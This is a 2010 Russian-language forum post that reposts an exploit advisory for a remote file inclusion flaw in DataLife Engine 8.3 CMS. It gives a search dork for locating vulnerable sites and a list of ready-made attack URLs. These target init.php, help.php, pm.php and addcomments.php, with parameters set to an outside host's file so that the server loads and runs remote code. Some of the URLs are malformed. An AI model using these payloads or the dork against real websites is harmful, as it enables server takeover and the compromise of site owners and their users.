31.01.2010, 21:44
|
|
Познающий
Регистрация: 12.06.2008
Сообщений: 32
С нами:
9427499
Репутация:
22
|
|
================================================== ======================================
| # Title : DataLife Engine 8.3 RFI Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.iq-ty.com/vb
| # Script Home : http://villehost.net/files/DataLife%20Engine%208.3%20Full%20English%20UTF-8%20Encoded%20-%20www.cms-pedia.com.rar (pass=www.cms-pedia.com)
| # Dork : Powered by CMS Pedia � 2009 (DataLife Engine Support � 2009. CMS Pedia)
| # Tested on : windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)
| # Bug : RFI
====================== Exploit By indoushka =================================
# Exploit :
1- RFI
http://localhost/upload/engine/inc/include/init.php?selected_language=http://localhost/c.txt?
http://localhost/upload/engine/inc/help.php?config[langs]=http://localhost/c.txt?
http://localhost/upload/engine/ajax/pm.php?config[lang_=[EV!L]
http://localhost/upload/engine/ajax/addcomments.php?_REQUEST[skin]]=http://localhost/c.txt?
http://localhost/upload/engine/ajax/addcomments.php?_REQUEST[skin]]=http://localhost/c.txt?
http://www.example.com/engine/inc/include/init.php?selected_language=http://www.example2.com
http://www.example.com/engine/inc/help.php?config[langs]=http://www.example2.com
http://www.example.com/engine/ajax/pm.php?config[lang_=http://www.example2.com
http://www.example.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://www.example2.com
Последний раз редактировалось RedX; 31.01.2010 в 21:47..
|
|
|